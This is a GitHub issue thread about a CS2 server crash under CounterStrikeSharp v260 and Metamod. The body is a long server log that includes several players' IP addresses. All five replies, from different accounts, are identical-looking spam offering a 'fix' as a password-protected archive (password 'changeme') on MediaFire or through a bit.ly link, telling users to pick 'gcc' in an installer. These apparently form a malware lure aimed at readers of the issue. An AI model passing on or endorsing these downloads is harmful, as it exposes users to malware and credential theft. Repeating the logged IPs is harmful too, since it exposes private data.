### ISSUE TITLE
CNavGenParams causing a crash cssharp v260 metamod 1313

### ISSUE THREAD

**Issue by NikolaJyun** [roflmuffin/CounterStrikeSharp#561]
HostStateRequest::Start(HSR_GAME):  loop(levelload) id(11) addons() desc(Changelevel (de_vertigo))
SwitchToLoop levelload requested:  id [11] addons []
SV:  IGameSystem::LoopDeactivateAllSystems {
HO:  IGameSystem::LoopDeactivateAllSystems {
HO:  } IGameSystem::LoopDeactivateAllSystems done
SV:  } IGameSystem::LoopDeactivateAllSystems done
SV:  Server shutting down: NETWORK_DISCONNECT_LOOPDEACTIVATE (55)
CNetworkGameServerBase::SetServerState (ss_active -> ss_dead)
SV: CNetworkStringTableContainer::RemoveAllTables:  removing 12 tables
CL: CNetworkStringTableContainer::RemoveAllTables:  removing 12 tables
SV:  CGameRulesGameSystem::GameShutdown uninstalled game rules
SV:  CGameRules::CGameRules destructed
[META] Could not open folder "/home/cs2server/cs2retake/serverfiles/game/csgo/(null)" (沒有此一檔案或目錄)
[META] Loaded 0 plugins.
SV:  Level loading started for 'de_vertigo'
CL:  CLoopModeLevelLoad::MaybeSwitchToGameLoop switching to "game" loopmode with addons ()
SwitchToLoop game requested:  id [11] addons []
CNetworkGameServerBase::SetServerState (ss_dead -> ss_waitingforgamesessionmanifest)
SV:  maxplayers set to 10
Network socket 'server' opened on port 27021
19:49:46 [INFO] (plugin:GG1_MapChooser) OnMapEnd executed
19:49:46 [INFO] (plugin:GG1_MapChooser) de_vertigo loaded
19:49:46 [INFO] (plugin:GG1_MapChooser) ResetData from On Map Start
19:49:46 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch false
19:49:46 [INFO] (plugin:GG1_MapChooser) Played maps: de_vertigo
19:49:46 [INFO] (plugin:GG1_MapChooser) RTV timer started
19:49:46 [INFO] (plugin:GG1_MapChooser) OnMapstart finished
Initializing CSGO VScript Game System
SV:  Executing server defaults
SV:  Executing dedicated server config file
GameTypes: could not find matching game mode value of "" in any game type.
SV:  CGameRulesGameSystem::GameInit installed game rules
[19:49:46.181] CSSharp: CGameSystem::BuildGameSessionManifest
exec: couldn't exec '{*}cfg/skill1.cfg', unable to read file
execing server_default.cfg
execing server.cfg
execing gamemode_competitive.cfg
exec: couldn't exec '{*}cfg/gamemode_competitive_server.cfg', unable to read file
Model models/props/crates/csgo_drop_crate_spectrum2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_armsdeal1.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_armsdeal3.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_huntsman.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_22.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_dangerzone.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_spectrum.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_phoenix.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_chroma2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_wildfire.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_28.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_27.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_32.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_31.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_breakout.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_horizon.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_clutch.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_gamma2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_bloodhound.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_30.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_bravo.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_25.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_revolver.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_chroma3.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_shadow.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_vanguard.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_hydra.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_chroma.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_winteroffensive.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_26.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_24.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_29.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_gamma.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_armsdeal2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_23.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_glove.vmdl: sequence/animation name collision found "tools_preview"
SV:  Spawn Server: de_vertigo
CNetworkGameServerBase::SetServerState (ss_waitingforgamesessionmanifest -> ss_loading)
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client '瘋狗先生 沉默の狂犬'
Client 256 '瘋狗先生 沉默の狂犬' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Shoukula'
Client 4 'Shoukula' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client '暈豹'
Client 8 '暈豹' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Sazanami'
Client 263 'Sazanami' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'fROGÄND'
Client 3 'fROGÄND' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'ranni enjoyer'
Client 5 'ranni enjoyer' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Yankai'
Client 262 'Yankai' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'YraN'
Client 2 'YraN' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV:  Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'R1XTO ♥'
Client 9 'R1XTO ♥' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
CWorldRendererMgr::ServiceWorldRequests long frame: 218.648656ms
Failed loading resource "maps/prefabs/misc/terrorist_team_intro_variant2/world_visibility.vvis_c" (ERROR_FILEOPEN: File not found)
CNetworkGameServerBase::SetServerState (ss_loading -> ss_active)
SV:  CNetworkServerService::FinishChangeLevel:  reactivating previous clients
Reactivate moving 'YraN' from slot 2 to slot 1
Reactivate moving 'fROGÄND' from slot 3 to slot 2
Reactivate moving 'Shoukula' from slot 4 to slot 3
Reactivate moving 'ranni enjoyer' from slot 5 to slot 4
Reactivate moving 'Yankai' from slot 6 to slot 5
Reactivate moving 'Sazanami' from slot 7 to slot 6
Reactivate moving '暈豹' from slot 8 to slot 7
Reactivate moving 'R1XTO ♥' from slot 9 to slot 8
SV:  IGameSystem::LoopActivateAllSystems {
HO:  IGameSystem::LoopActivateAllSystems {
HO:  } IGameSystem::LoopActivateAllSystems done
SV:  } IGameSystem::LoopActivateAllSystems done
Created physics for de_vertigo
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
  used during construction differ from defaults. Please re-export the map.
SV:  10 player server started
ClientPutInServer create new player controller [Dragomir]
"Dragomir<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.30 
19:49:48 [INFO] (plugin:GG1_MapChooser) T Wins 0, CTWins 0
[Clutch Announce 1.1.0] OnRoundEnd event fired!
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
19:49:48 [INFO] (plugin:GG1_MapChooser) T Wins 1, CTWins 0
[Clutch Announce 1.1.0] OnRoundEnd event fired!
"Slingshot<9><BOT><TERRORIST>" ChangeTeam() CTMDBG , team 2, req team 3 willSwitch 0, 1.30 
Host activate: Changelevel (de_vertigo)
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
ClientPutInServer create new player controller [Arno]
"Arno<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.31 
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
19:49:48 [INFO] (plugin:GG1_MapChooser) T Wins 1, CTWins 0
[Clutch Announce 1.1.0] OnRoundEnd event fired!
1.312500 Long frame (WarmupPeriod): 23.01ms elapsed, 22.90ms sim time, 1 ticks, 84..84.
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
ClientPutInServer create new player controller [Maximus]
"Maximus<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.33 
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
19:49:48 [INFO] (plugin:GG1_MapChooser) T Wins 1, CTWins 0
[Clutch Announce 1.1.0] OnRoundEnd event fired!
1.328125 Long frame (WarmupPeriod): 19.71ms elapsed, 19.60ms sim time, 1 ticks, 85..85.
ClientPutInServer create new player controller [YraN]
YraN @ 1.170.53.131:57395:  NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [暈豹]
暈豹 @ 128.1.225.14:37574:  NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [Sazanami]
Sazanami @ 111.250.125.250:53267:  NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [fROGÄND]
fROGÄND @ 180.214.190.98:51671:  NetChan Setting Timeout to 120.00 seconds
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
ClientPutInServer create new player controller [Officer]
"Officer<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.34 
19:49:48 [INFO] (plugin:GG1_MapChooser) ResetData from On last client disconnect
19:49:48 [INFO] (plugin:GG1_MapChooser) On Initialise Map set: CanClinch true
19:49:48 [INFO] (plugin:GG1_MapChooser) T Wins 1, CTWins 0
[Clutch Announce 1.1.0] OnRoundEnd event fired!
SV: 8(暈豹) changed min command queue size to 2
1.343750 Long frame (WarmupPeriod): 20.41ms elapsed, 20.25ms sim time, 1 ticks, 86..86.
ClientPutInServer create new player controller [Yankai]
Yankai @ 122.99.45.11:55227:  NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [Shoukula]
Shoukula @ 161.81.224.82:49263:  NetChan Setting Timeout to 120.00 seconds
/home/cs2server/cs2retake/lgsm/modules/command_debug.sh: 第 121 列： 41747 程式記憶體區段錯誤   (核心已傾印) ./cs2 -dedicated -ip 220.132.77.244 -port 27021 -maxplayers 10 -authkey +exec cs2server.cfg
[ ERROR ] Debuging cs2server: Server has stopped: exit code: 0
[ ERROR ] Debuging cs2server: Press ENTER to exit debug mode

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
